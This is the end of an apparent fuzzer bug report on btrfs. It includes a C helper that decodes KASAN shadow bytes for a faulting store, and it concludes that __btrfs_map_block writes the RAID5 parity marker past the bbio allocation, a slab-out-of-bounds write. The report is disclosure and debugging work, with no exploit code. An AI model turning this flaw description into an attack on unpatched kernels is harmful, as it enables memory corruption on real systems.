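    switch (s) {
    case KASAN_KMALLOC_REDZONE: return "slab-out-of-bounds (kmalloc redzone)";
    case KASAN_KMALLOC_FREE:    return "use-after-free (freed slab object)";
    case KASAN_PAGE_REDZONE:    return "out-of-bounds (page redzone)";
    case KASAN_FREE_PAGE:       return "use-after-free (freed page)";
    default:                    return "poisoned (other)";
    }
}

/* The decision the instrumented store makes (__asan_store8 in the disassembly):
 * walk every 8-byte granule the access touches; a granule is bad when its shadow
 * is a poison value, or a partial value no larger than the offset of the last
 * byte accessed inside it. Returns 0 for a clean access, the offending shadow
 * byte otherwise, and -1 if the address is not covered by the quoted rows. */
int kasan_check_access(uint64_t addr, unsigned size)
{
    uint64_t end = addr + size;
    for (uint64_t a = addr; a < end; a = (a | 7) + 1) {
        int s = shadow_byte_for(a);
        uint64_t granule_end = (a | 7) + 1;
        uint64_t last = (end < granule_end ? end : granule_end) - 1;
        if (s < 0)
            return -1;
        if (s != 0 && (s > 7 || (unsigned)(last & 7) >= (unsigned)s))
            return s;
    }
    return 0;
}

int main(void)
{
    uint64_t object = 0xffff888066d49000ULL;   /* "object at ffff888066d49000" */
    uint64_t bad = 0xffff888066d49080ULL;      /* "Write of size 8 at addr ..." */
    int s = kasan_check_access(bad, 8);
    printf("shadow of object base %#llx is %#llx (compare r11 in the debug view)\n",
           (unsigned long long)object, (unsigned long long)kasan_shadow_addr(object));
    printf("8-byte store at %#llx: shadow %#x -> %s\n",
           (unsigned long long)bad, s, shadow_kind(s));
    return 0;
}
```

The same walk explains the redzone/free pattern in the rows after the object: a store that starts inside the object but extends past 0x...9080 (for instance a 129-byte access from the object base) is flagged on its last granule, while any access that stays within the sixteen 0x00 granules of the 128-byte object is clean.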

Conclusion

When nr_data_stripes(map) returns 1 for a chunk whose map->num_stripes is larger than the number of raid_map entries allocated for the bbio, __btrfs_map_block stores the RAID5 parity marker past the end of the bbio allocation, a slab-out-of-bounds write.

Discoverer

Team bobfuzzer

Acknowledgments

This project used a port (to the 5.0.21 and 5.3.14 Linux kernels) of the filesystem fuzzer 'JANUS', developed by the Georgia Tech Systems Software & Security Lab (SSLab).

Thank you for the excellent fuzzer and the paper below.